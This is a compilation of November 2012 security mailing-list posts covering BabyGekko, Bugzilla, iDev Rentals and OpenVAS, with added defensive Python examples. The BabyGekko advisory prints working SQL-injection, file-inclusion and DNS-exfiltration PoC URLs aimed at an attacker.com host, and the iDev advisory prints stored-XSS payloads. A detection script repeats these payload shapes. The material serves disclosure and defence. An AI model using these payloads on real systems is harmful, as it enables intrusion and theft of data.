0-day vulnerabilities in Call of Duty MW3 and CryEngine 3

2012-11-14 Thread ReVuln

Following our presentation at POC2012 [1] conference, we have released:
a paper [2] regarding a NULL pointer dereference vulnerability affecting
Call of Duty: Modern Warfare 3 [3], and a video [4] demonstrating a remote
code execution vulnerability affecting CryEngine 3 [5].

[1] http://powerofcommunity.net
[2] http://revuln.com/files/ReVuln_CoDMW3_null_pointer_dereference.pdf
[3] http://www.callofduty.com/mw3
[4] http://vimeo.com/53425372
[5] http://www.crytek.com/cryengine/cryengine3


---
ReVuln
http://revuln.com
http://twitter.com/revuln





Re: [oss-security] Re: [OVSA20121112] OpenVAS Manager Vulnerable To Command Injection

2012-11-14 Thread Jan Lieskovsky
Hello Tim,

  thank you for the heads up and notification.

The versions of the openvas-manager package, as shipped with Fedora release 16
and release 17, are based on the upstream 2.0.5 version yet. From what I have looked
at and can tell from the upstream advisory and patch (for the 3.0.X version):
[1] http://www.openvas.org/OVSA20121112.html
[2] http://wald.intevation.org/scm/viewvc.php?view=rev&root=openvas&revision=14437

the CVE-2012-5520 does not seem to be applicable to the OpenVAS-4 / openvas-manager 2.0.5
version yet:
[3] http://lists.wald.intevation.org/pipermail/openvas-announce/2012-August/000140.html

But prior to definitively classifying the Fedora 16 and Fedora 17 openvas-manager package versions
as not vulnerable to this issue, I would like to hear an opinion / confirmation from someone
more familiar with the OpenVAS code.

So could you confirm the CVE-2012-5520 wouldn't affect the OpenVAS-4 2.0.X version (yet)?

Thank you & Regards, Jan.
--
Jan iankko Lieskovsky / Red Hat Security Response Team

- Original Message -
Doh, a document gets proof read by multiple people and yet it contains a 
mistake.  In the Current Status section of the advisory, the date is 
incorrect.  A corrected advisory is attached.

Tim
-- 
Tim Brown
mailto:timb@openvas,org
http://www.openvas.org/


Multiple vulnerabilities in BabyGekko

2012-11-14 Thread advisory
Advisory ID: HTB23122
Product: BabyGekko
Vendor: babygekko.com
Vulnerable Version(s): 1.2.2e and probably prior
Tested Version: 1.2.2e
Vendor Notification: October 24, 2012 
Vendor Patch: November 4, 2012 
Public Disclosure: November 14, 2012 
Vulnerability Type: SQL Injection [CWE-89], PHP File Inclusion [CWE-98], 
Cross-Site Scripting [CWE-79]
CVE References: CVE-2012-5698, CVE-2012-5699, CVE-2012-5700
CVSSv2 Base Scores: 6.5 (AV:N/AC:L/Au:S/C:P/I:P/A:P), 7.6 
(AV:N/AC:H/Au:N/C:C/I:C/A:C), 4.3 (AV:N/AC:M/Au:N/C:N/I:P/A:N)
Solution Status: Fixed by Vendor
Risk Level: High 
Discovered and Provided: High-Tech Bridge Security Research Lab ( 
https://www.htbridge.com/advisory/ ) 

---

Advisory Details:

High-Tech Bridge Security Research Lab discovered multiple vulnerabilities in 
BabyGekko, which can be exploited to include local PHP files, perform SQL 
Injection and Cross-Site Scripting (XSS) attacks.


1) Multiple SQL Injections in BabyGekko

Two SQL injections exist in the BabyGekko administrator's panel, but their 
exploitation demands administrator's privileges. However, they can also be 
exploited by a non-authenticated malicious user via a CSRF vector, because the 
/admin/index.php script is also vulnerable to CSRF attack. In order to do so, 
he has to make a logged-in administrator visit a malicious page. 

1.1 The vulnerability exists due to insufficient validation of input passed via 
the keyword parameter to /admin/index.php (when app is set to users). A 
remote authenticated administrator can manipulate SQL queries and execute 
arbitrary SQL commands within the application's database. 

The following PoC (Proof-of-Concept) will create (depending on web server and 
database permissions) a file /tmp/.class.php and write <?phpinfo()?> 
into it:

http://[host]/admin/index.php?app=users&ajax=1&action=search&keyword=1%27%29%20UNION%20SELECT%201,2,3,4,5,6,7,8,%27%3C?%20phpinfo%28%29;%20?%3E%27%20INTO%20OUTFILE%20%27/tmp/.class.php%27%20--%202%20

The second PoC code below is based on the DNS exfiltration technique and may be 
used in cases when the application's database is hosted on a Windows system. The 
PoC sends a DNS request to resolve an IP address for the `version()` (or any 
other sensitive output from the database) subdomain of .attacker.com, located 
on an attacker-controlled DNS server:

http://[host]/admin/index.php?app=users&ajax=1&action=search&keyword=%27 OR 
1=(select load_file(CONCAT(CHAR(92),CHAR(92),(select 
version()),CHAR(46),CHAR(97),CHAR(116),CHAR(116),CHAR(97),CHAR(99),CHAR(107),CHAR(101),CHAR(114),CHAR(46),CHAR(99),CHAR(111),CHAR(109),CHAR(92),CHAR(102),CHAR(111),CHAR(111),CHAR(98),CHAR(97),CHAR(114
 -- 

1.2 The vulnerability exists due to insufficient validation of input passed via 
the query parameter to /admin/index.php. A remote authenticated 
administrator can manipulate SQL queries and execute arbitrary SQL commands 
within the application's database.

The following PoC will create (depending on web server and database 
permissions) a file /tmp/.class.php and write <?phpinfo()?> into it:

http://[host]/admin/index.php?app=html&action=getlistofusers&query=1%27%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,%27%3C?%20phpinfo%28%29;%20?%3E%27%20INTO%20OUTFILE%20%27/tmp/.class.php%27%20--%202%20

The second PoC code below is based on the DNS exfiltration technique and may be 
used in cases when the application's database is hosted on a Windows system. The 
PoC sends a DNS request to resolve an IP address for the `version()` (or any 
other sensitive output from the database) subdomain of .attacker.com, located 
on an attacker-controlled DNS server:

http://[host]/admin/index.php?app=html&action=getlistofusers&query=%27 OR 
1=(select load_file(CONCAT(CHAR(92),CHAR(92),(select 
version()),CHAR(46),CHAR(97),CHAR(116),CHAR(116),CHAR(97),CHAR(99),CHAR(107),CHAR(101),CHAR(114),CHAR(46),CHAR(99),CHAR(111),CHAR(109),CHAR(92),CHAR(102),CHAR(111),CHAR(111),CHAR(98),CHAR(97),CHAR(114
 -- 


2) Local File Inclusion in BabyGekko

The vulnerability exists due to insufficient validation of input passed via the 
app parameter to index.php. A remote attacker can include arbitrary files 
from local system using directory traversal sequences with NULL byte. 

The following PoC will show the /etc/passwd file:

http://[host]/index.php?app=../../../../../../../etc/passwd%00

The second PoC demonstrates inclusion of the /tmp/.class.php file created during 
exploitation of vulnerabilities 1.1 or 1.2. Depending on server configuration 
and permissions, it will show the results of phpinfo() function execution:

http://[host]/index.php?app=../../../../../../../tmp/


3) Multiple Cross-Site Scripting (XSS) in BabyGekko

3.1 Input passed via the id parameter to /admin/index.php is not properly 
sanitized. A remote attacker can execute arbitrary HTML and script code in 
administrator's browser in context of vulnerable website.
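
The attack shapes in this advisory (directory traversal with a NUL byte in the app parameter, UNION SELECT ... INTO OUTFILE, load_file() with a UNC path built from CHAR() calls, and admin-panel requests driven by CSRF from another site) are easy to spot in web server logs. The following detection script is an added example, not part of the High-Tech Bridge advisory or of BabyGekko; the log lines, IP addresses, host names and the SITE_HOST value are constructed for the demonstration.

```python
import re
from urllib.parse import unquote_plus, urlsplit

# Constructed: the host the admin panel is served from. A request to /admin/
# whose Referer points at another host is the CSRF shape the advisory describes.
SITE_HOST = "shop.example"

# Constructed combined-format access-log lines (IPs, hosts and times are made
# up; the query strings mirror the PoC shapes from the advisory).
SAMPLE_LOG = r'''
203.0.113.7 - - [14/Nov/2012:10:00:01 +0000] "GET /index.php?app=home HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
203.0.113.7 - - [14/Nov/2012:10:00:05 +0000] "GET /index.php?app=../../../../../../../etc/passwd%00 HTTP/1.1" 200 1832 "-" "Mozilla/5.0"
203.0.113.9 - - [14/Nov/2012:10:01:12 +0000] "GET /admin/index.php?app=users&ajax=1&action=search&keyword=1%27%29%20UNION%20SELECT%201,2,3,4,5,6,7,8,%27x%27%20INTO%20OUTFILE%20%27/tmp/.class.php%27%20--%202%20 HTTP/1.1" 200 311 "http://evil.example/lure.html" "Mozilla/5.0"
203.0.113.9 - - [14/Nov/2012:10:01:40 +0000] "GET /admin/index.php?app=html&action=getlistofusers&query=%27%20OR%201=(select%20load_file(CONCAT(CHAR(92),CHAR(92),(select%20version()),CHAR(46),CHAR(97)))) HTTP/1.1" 200 311 "-" "Mozilla/5.0"
198.51.100.4 - - [14/Nov/2012:10:02:00 +0000] "GET /admin/index.php?app=users&action=edit&id=12 HTTP/1.1" 200 2048 "http://shop.example/admin/index.php?app=users" "Mozilla/5.0"
'''

# Apache/nginx "combined" log format with Referer and User-Agent.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) \S+" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

# Patterns matched against each decoded parameter value.
SQLI_PATTERNS = [
    re.compile(r"union\s+select", re.I),
    re.compile(r"into\s+(out|dump)file", re.I),
    re.compile(r"load_file\s*\(", re.I),
    re.compile(r"(char\(\d+\)\s*,\s*){3,}", re.I),  # CHAR() chains used to hide strings
]


def parse_query(raw_query):
    """Decode a raw query string into (name, value) pairs.

    Done by hand (split only on '&') so a literal ';' inside a value is kept;
    urllib.parse.parse_qs treats ';' differently across Python versions.
    """
    pairs = []
    for part in raw_query.split("&"):
        if part:
            name, _, value = part.partition("=")
            pairs.append((unquote_plus(name), unquote_plus(value)))
    return pairs


def classify(entry):
    """Return the list of rule names a log entry trips (empty if none)."""
    hits = []
    url = urlsplit(entry["path"])
    for name, value in parse_query(url.query):
        # LFI: traversal sequences or an embedded NUL in the include selector.
        if name == "app" and ("\x00" in value or ".." in value):
            hits.append("lfi_traversal")
        if any(p.search(value) for p in SQLI_PATTERNS):
            hits.append("sqli")
    # CSRF shape: an admin-panel request referred from a foreign site.
    if url.path.startswith("/admin/"):
        ref_host = urlsplit(entry["referer"]).hostname
        if ref_host and ref_host != SITE_HOST:
            hits.append("admin_request_from_offsite_referer")
    return hits


def scan(log_text):
    """Parse each line and return (ip, path, hits) for lines that trip a rule."""
    findings = []
    for line in log_text.strip().splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # not a combined-format line; skip rather than crash
        entry = m.groupdict()
        hits = classify(entry)
        if hits:
            findings.append((entry["ip"], urlsplit(entry["path"]).path, hits))
    return findings


if __name__ == "__main__":
    for ip, path, hits in scan(SAMPLE_LOG):
        print(f"{ip} {path}: {', '.join(hits)}")
```

The Referer rule is a heuristic only: browsers may strip the header, and the real fix on the application side is a per-session anti-CSRF token on every state-changing admin action, together with parameterized SQL queries and an allow-list for the app include selector.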


Security advisory for Bugzilla 4.4rc1, 4.2.4, 4.0.9 and 3.6.12

2012-11-14 Thread LpSolit
Summary
=======

Bugzilla is a Web-based bug-tracking system used by a large number of
software projects. The following security issues have been discovered
in Bugzilla:

* Confidential product and component names can be disclosed to
  unauthorized users if they are used to control the visibility of
  a custom field.

* When calling the 'User.get' WebService method with a 'groups'
  argument, it is possible to check if the given group names exist
  or not.

* Due to incorrectly filtered field values in tabular reports, it is
  possible to inject code which can lead to XSS.

* When trying to mark an attachment in a bug you cannot see as
  obsolete, the description of the attachment is disclosed in the
  error message.

* A vulnerability in swfstore.swf from YUI2 can lead to XSS.

All affected installations are encouraged to upgrade as soon as
possible.


Vulnerability Details
=====================

Class:       Information Leak
Versions:    3.3.4 to 3.6.11, 3.7.1 to 4.0.8, 4.1.1 to 4.2.3,
             4.3.1 to 4.3.3
Fixed In:    3.6.12, 4.0.9, 4.2.4, 4.4rc1
Description: If the visibility of a custom field is controlled by
             a product or a component of a product you cannot see,
             their names are disclosed in the JavaScript code
             generated for this custom field although they should
             remain confidential.
References:  https://bugzilla.mozilla.org/show_bug.cgi?id=731178
CVE Number:  CVE-2012-4199

Class:       Information Leak
Versions:    3.7.1 to 4.0.8, 4.1.1 to 4.2.3, 4.3.1 to 4.3.3
Fixed In:    4.0.9, 4.2.4, 4.4rc1
Description: Calling the User.get method with a 'groups' argument leaks
             the existence of the groups depending on whether an error
             is thrown or not. This method now also throws an error if
             the user calling this method does not belong to these
             groups (independently of whether the groups exist or not).
References:  https://bugzilla.mozilla.org/show_bug.cgi?id=781850
CVE Number:  CVE-2012-4198

Class:       Cross-Site Scripting
Versions:    4.1.1 to 4.2.3, 4.3.1 to 4.3.3
Fixed In:    4.2.4, 4.4rc1
Description: Due to incorrectly filtered field values in tabular
             reports, it is possible to inject code leading to XSS.
References:  https://bugzilla.mozilla.org/show_bug.cgi?id=790296
CVE Number:  CVE-2012-4189

Class:       Information Leak
Versions:    2.16 to 3.6.11, 3.7.1 to 4.0.8, 4.1.1 to 4.2.3,
             4.3.1 to 4.3.3
Fixed In:    3.6.12, 4.0.9, 4.2.4, 4.4rc1
Description: Trying to mark an attachment in a bug you cannot see as
             obsolete discloses its description in the error message.
             The description of the attachment is now removed from
             the error message.
References:  https://bugzilla.mozilla.org/show_bug.cgi?id=802204
CVE Number:  CVE-2012-4197

Class:       Cross-Site Scripting
Versions:    3.7.1 to 4.0.8, 4.1.1 to 4.2.3, 4.3.1 to 4.3.3
Fixed In:    4.0.9, 4.2.4, 4.4rc1
Description: A vulnerability in swfstore.swf from YUI2 allows
             JavaScript injection exploits to be created against
             domains that host this affected YUI .swf file.
References:  https://bugzilla.mozilla.org/show_bug.cgi?id=808845
             http://yuilibrary.com/support/20121030-vulnerability/
CVE Number:  CVE-2012-5475
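
The User.get 'groups' issue above (CVE-2012-4198) is an error-oracle leak: the caller learns whether a group exists from whether the call fails. The fix the advisory describes removes the distinction by failing the same way whenever the caller is not a member. The Python below is an added illustration of that before/after behaviour, not Bugzilla's Perl code; the group table, user names and error strings are constructed.

```python
# Constructed group table: group name -> set of member logins.
GROUPS = {
    "editbugs": {"alice", "bob"},
    "secteam": {"alice"},
}


class UserError(Exception):
    """Error returned to the WebService caller."""


def leaky_check(caller, wanted_groups):
    """Pre-fix behaviour: an unknown group name raises a distinct error while
    a known one is accepted regardless of membership, so any caller can tell
    existing group names from non-existing ones. `caller` is deliberately
    ignored, which is the defect."""
    for name in wanted_groups:
        if name not in GROUPS:
            raise UserError(f"invalid group name '{name}'")
    return list(wanted_groups)


def fixed_check(caller, wanted_groups):
    """Post-fix behaviour: a single error for both 'group does not exist' and
    'caller is not a member'. An unknown name is treated as an empty member
    set, so the two cases take the same code path and produce the same
    response."""
    for name in wanted_groups:
        if caller not in GROUPS.get(name, set()):
            raise UserError("You are not allowed to query these groups")
    return list(wanted_groups)


def probe(check, caller, name):
    """Return the error text a caller observes for one group name, or None
    when the call succeeds. This is exactly the oracle an unprivileged
    caller can read; a safe implementation returns the same value for
    existing and non-existing groups the caller is not in."""
    try:
        check(caller, [name])
    except UserError as e:
        return str(e)
    return None


def distinguishable(check, caller, name_a, name_b):
    """True if the two group names give the caller different observable results."""
    return probe(check, caller, name_a) != probe(check, caller, name_b)


if __name__ == "__main__":
    for check in (leaky_check, fixed_check):
        print(check.__name__, "oracle:",
              distinguishable(check, "mallory", "secteam", "nosuchgroup"))
```

The same principle applies to the attachment-description leak (CVE-2012-4197): an error message must carry no detail that depends on data the caller is not allowed to see.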

Vulnerability Solutions
=======================

The fixes for these issues are included in the 3.6.12, 4.0.9, 4.2.4
and 4.4rc1 releases. Upgrading to a release with the relevant fixes
will protect your installation from possible exploits of these issues.

If you are unable to upgrade but would like to patch just the
individual security vulnerabilities, there are patches available for
each issue at the References URL for each vulnerability.

Full release downloads, patches to upgrade Bugzilla from previous
versions, and CVS/bzr upgrade instructions are available at:

  http://www.bugzilla.org/download/


Credits
=======

The Bugzilla team wish to thank the following people/organizations for
their assistance in locating, advising us of, and assisting us to fix
this issue:

Frédéric Buclin
David Lawrence
Gervase Markham
Mateusz Goik

General information about the Bugzilla bug-tracking system can be found
at:

  http://www.bugzilla.org/

Comments and follow-ups can be directed to the mozilla.support.bugzilla
newsgroup or the support-bugzilla mailing list.
http://www.bugzilla.org/support/ has directions for accessing these
forums.


iDev Rentals v1.0 - Multiple Web Vulnerabilities

2012-11-14 Thread Vulnerability Lab
Title:
==
iDev Rentals v1.0 - Multiple Web Vulnerabilities


Date:
=
2012-11-14


References:
===
http://www.vulnerability-lab.com/get_content.php?id=760


VL-ID:
=
758


Common Vulnerability Scoring System:
====================================
3.5


Introduction:
=
idev-Rentals is a PHP Script (special software for your website) allows you to 
create an apartment / housing / accommodation 
rentals listing directory. You and your website visitors can add property 
rentals, upload photos, add property location 
information that will display visually on a Google Map embedded plugin. You can 
choose to charge for listings, or make your 
rentals directory entire free for visitors to post their rental listings to. 
idev-Rentals allows you to service either a broad 
or highly targeted region. You can create a worldwide rentals directory or a 
rentals directory limited to a specific city or region.

You can customize the appearance entirely, add your own graphics, logo, colors, 
header/footer, and fully integrate idev-Rentals 
in to your website! More theme style templates are available from our demo 
page. When you purchase idev-Rentals, we will deliver 
(electronically) to you the files that you will then need to upload to your 
website in order to run idev-Rentals There is a simple 
installation process (that we fully support) (and we also offer a complete 
installation service, if you need that kind of help) the 
entire process can completed in as little as 5 minutes.

You will have full access to an administrative control panel area where you 
will be able to manage all idev-Rentals functions easily 
and without any technical knowledge. All of our website software (PHP Scripts) 
are designed to be customized fully. We include a good 
selection of pre-made professional theme style templates free with purchase 
(and we are constantly expanding upon our template library). 
You will have the option to create your own theme style templates (feel free to 
share them with the community!) and if you are a 
programmer/advanced developer, you will also have full access to our source 
code, which means that you can literally change anything or 
add any features that you might need. Create an Open Rentals Directory Website 
As a business startup idea, you could be the first in your 
area to offer a rentals listings website which is open to visitors to submit 
their own rental listings. This can be a wonderful money 
earning business startup idea since you could then place advertising, or charge 
for listings on your website.

(Copy of the Vendor Homepage: http://idevspot.com/idev-rentals.php )


Abstract:
=
The Vulnerability Laboratory Research Team discovered multiple Web 
Vulnerabilities in the idev Rentals v1.0 php rental script.


Report-Timeline:
================
2012-11-14: Public Disclosure


Status:
=======
Published


Exploitation-Technique:
===
Remote


Severity:
=
Medium


Details:
========
Multiple persistent input validation vulnerabilities are detected in the 
idev-Rentals 1.0 php rental script. 
The bugs allow remote attackers to implement/inject malicious script code on 
the application side (persistent). 
The persistent vulnerabilities are located in the add listing, add category and 
add package modules with the 
bound vulnerable Title, Caption, Description, Location, Category name, Package 
Name and Package Description parameters. 
Successful exploitation of the vulnerability can lead to session hijacking 
(manager/admin) or stable (persistent) 
context manipulation. Exploitation requires low user interaction & a privileged 
web application user account.


Vulnerable Module(s):
[+] Add Listing
[+] Add Category
[+] Add Package

Vulnerable Parameter(s):
[+] [Title][Caption][Description] [Location] 
[+] [Category name]
[+] [Package Name] - [Package Description]


Proof of Concept:
=
The persistent input validation vulnerabilities can be exploited by remote 
attackers with a low or medium privileged application user account 
and with low or medium required user interaction. For demonstration or 
reproduce ...

1.2.1
The remote attacker can add a standard listing to inject own malicious persistent 
script code,
<iframe src=http://www.vulnerability-lab.com onload=alert(VL)></iframe>, in 
the fields Title, Caption, Description, Location.
When an admin is processing to view the users listing, the malicious script code 
will be executed. 

URL: 
http://idevnetwork.127.0.0.1:1336/[PATH]/idev-rentals/index.php?page=account_add

1.2.2 
The remote attacker can add a category to inject own malicious persistent script 
code, 
<iframe src=http://www.vulnerability-lab.com onload=alert(VL)></iframe>, in 
the field category name.
When a user is processing to view the category listing, the malicious script 
code 

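Both stored-XSS reports on this page (the iDev Rentals listing, category and package fields above, and section 3.1 of the BabyGekko advisory earlier) come down to user-supplied strings being written into HTML without output encoding. The Python below is an added example, not code from either product: it renders one constructed listing record the unsafe way and the safe way, encoding each field for the context it lands in (HTML text, attribute value, URL query component), and checks the result for tags the template never emits. Field names follow the iDev advisory; the listing values are constructed.

```python
import html
import re
from urllib.parse import quote

# Constructed: a listing as a vulnerable application would have stored it, with
# the advisory's iframe payload sitting in the Title field.
LISTING = {
    "title": '<iframe src=http://www.vulnerability-lab.com onload=alert("VL")></iframe>',
    "caption": 'Sunny flat "near" the park',
    "description": "2 rooms & balcony",
    "location": "Berlin",
}

# Tag names the template itself emits; anything else came from user data.
TEMPLATE_TAGS = {"h2", "p", "a"}
OPEN_TAG_RE = re.compile(r"<\s*/?\s*([a-zA-Z][a-zA-Z0-9]*)")


def render_unsafe(listing):
    """Pre-fix pattern: fields are concatenated straight into the markup, so a
    stored payload becomes live HTML when an admin or visitor views the page."""
    return (f"<h2>{listing['title']}</h2>"
            f"<p title=\"{listing['caption']}\">{listing['description']}</p>"
            f"<a href=\"/search?location={listing['location']}\">{listing['location']}</a>")


def render_safe(listing):
    """Encode per context: html.escape(quote=True) for text nodes and
    double-quoted attribute values, percent-encoding for the URL query
    component. The stored payload is displayed as text, not executed."""
    def esc(s):
        return html.escape(s, quote=True)

    return (f"<h2>{esc(listing['title'])}</h2>"
            f"<p title=\"{esc(listing['caption'])}\">{esc(listing['description'])}</p>"
            f"<a href=\"/search?location={quote(listing['location'], safe='')}\">"
            f"{esc(listing['location'])}</a>")


def unexpected_tags(fragment):
    """Tag names present in a rendered fragment that the template never emits.
    Useful as a regression check in tests: the set must be empty."""
    found = {m.group(1).lower() for m in OPEN_TAG_RE.finditer(fragment)}
    return found - TEMPLATE_TAGS


if __name__ == "__main__":
    print("unsafe:", unexpected_tags(render_unsafe(LISTING)))
    print("safe:  ", unexpected_tags(render_safe(LISTING)))
    print(render_safe(LISTING))
```

Note that escaping belongs at output time, per context; an input filter that strips `<iframe` on the way in is easy to bypass and leaves every other output context (attributes, URLs, JavaScript) unprotected.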
Re: Re: [oss-security] Re: [OVSA20121112] OpenVAS Manager Vulnerable To Command Injection

2012-11-14 Thread Michal Ambroz
Hello Jan,

in version 2.0.5 the discussed vulnerable line looks like this:
 command = g_strdup_printf ("/bin/sh %s %s > %s 2> /dev/null",
                            script,
                            xml_file,
                            output_file);

So there is no IP and PORT to be sanitized, so 2.0.5 is probably on the safe 
side of this vulnerability.

If you deem it safer we can bump to the current 3.0.x version - I know it is 
usually a no-no, but there should be no casualties,
since I sincerely doubt there are _ANY_ openvas users on the Fedora distribution 
(16/17) as half of the openvas suite packages are still under review.

Mainly the openvas suite doesn't work on current Fedora due to incompatibility 
between openvas network stack (openvas-libraries) and the gnutls library we 
have in Fedora.

Best regards
Michal Ambroz
(one of Fedora openvas-* packagers)




  Original message 
 From: Jan Lieskovsky jlies...@redhat.com
 Subject: Re: [oss-security] Re: [OVSA20121112] OpenVAS Manager Vulnerable To
 Command Injection
 Date: 14.11.2012 11:55:09
 
 Hello Tim,

   thank you for the heads up and notification.

 The versions of the openvas-manager package, as shipped with Fedora release 16
 and release 17, are based on the upstream 2.0.5 version yet. From what I have looked
 at and can tell from the upstream advisory and patch (for the 3.0.X version):
 [1] http://www.openvas.org/OVSA20121112.html
 [2] http://wald.intevation.org/scm/viewvc.php?view=rev&root=openvas&revision=14437

 the CVE-2012-5520 does not seem to be applicable to the OpenVAS-4 / openvas-manager 2.0.5
 version yet:
 [3] http://lists.wald.intevation.org/pipermail/openvas-announce/2012-August/000140.html

 But prior to definitively classifying the Fedora 16 and Fedora 17 openvas-manager package versions
 as not vulnerable to this issue, I would like to hear an opinion / confirmation from someone
 more familiar with the OpenVAS code.

 So could you confirm the CVE-2012-5520 wouldn't affect the OpenVAS-4 2.0.X version (yet)?

 Thank you & Regards, Jan.
 --
 Jan iankko Lieskovsky / Red Hat Security Response Team

 - Original Message -
 Doh, a document gets proof read by multiple people and yet it contains a
 mistake.  In the Current Status section of the advisory, the date is 
 incorrect.  A corrected advisory is attached.

 Tim
 --
 Tim Brown
 mailto:timb@openvas,org
 http://www.openvas.org/
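
The g_strdup_printf() line quoted in Michal's reply shows the general hazard behind OVSA20121112: a command line is assembled by string formatting and then handed to /bin/sh, which re-parses it, so any argument that later acquires attacker-influenced content (the host and port the 3.0.x advisory is about) can change the command's meaning. The Python below is an added example written for this page, not OpenVAS code: it contrasts the fragile string-building pattern with an argument vector and with quoting, and adds the strict host/port validation a defender would want in front of either. That the 3.0.x code interpolates a host and a port into this same string is an assumption drawn from the discussion; the exact 3.0.x line is not on this page.

```python
import ipaddress
import shlex
import subprocess


def build_shell_command(script, xml_file, output_file, host, port):
    """Fragile pattern (the shape of the quoted g_strdup_printf call, with the
    assumed host/port arguments): everything is pasted into one string that
    /bin/sh re-parses, so shell metacharacters in any argument become syntax."""
    return f"/bin/sh {script} {xml_file} {host} {port} > {output_file} 2> /dev/null"


def build_argv(script, xml_file, host, port):
    """Safe pattern: an argument vector; no shell ever parses the values."""
    return ["/bin/sh", script, xml_file, str(host), str(port)]


def quoted_shell_command(script, xml_file, output_file, host, port):
    """If a shell is unavoidable (e.g. for the redirections), quote each value
    so it stays one word. shlex.quote is the Python analogue of GLib's
    g_shell_quote()."""
    parts = " ".join(shlex.quote(str(a)) for a in (script, xml_file, host, port))
    return f"/bin/sh {parts} > {shlex.quote(output_file)} 2> /dev/null"


def validate_host(host):
    """Accept only an IPv4/IPv6 literal; anything else raises ValueError."""
    return str(ipaddress.ip_address(host))


def validate_port(port):
    """Accept only an integer in 1..65535; anything else raises ValueError."""
    p = int(str(port), 10)
    if not 1 <= p <= 65535:
        raise ValueError(f"port out of range: {port}")
    return p


def rejects(validator, value):
    """True if the validator refuses the value with ValueError."""
    try:
        validator(value)
    except ValueError:
        return True
    return False


def shell_words(command):
    """The words a POSIX shell would see; extra words mean an argument
    was split, which is the tell-tale of injection."""
    return shlex.split(command)


def run_script(script, xml_file, output_file, host, port):
    """Run the script without a shell: arguments go through an argv vector,
    the redirections are done by Python, and host/port are validated first."""
    argv = build_argv(script, xml_file, validate_host(host), validate_port(port))
    with open(output_file, "wb") as out:
        proc = subprocess.run(argv, stdout=out, stderr=subprocess.DEVNULL, check=False)
    return proc.returncode


if __name__ == "__main__":
    # Constructed values; the host string carries a shell metacharacter.
    args = ("scan.sh", "in.xml", "out.txt", "127.0.0.1; echo injected", 1234)
    print("fragile:", shell_words(build_shell_command(*args)))
    print("quoted: ", shell_words(quoted_shell_command(*args)))
    print("argv:   ", build_argv("scan.sh", "in.xml", *args[3:]))
```

Validation and argv passing are complementary: the allow-list validation keeps the values meaningful to the script, and the argument vector means no shell metacharacter can matter even if validation is later loosened.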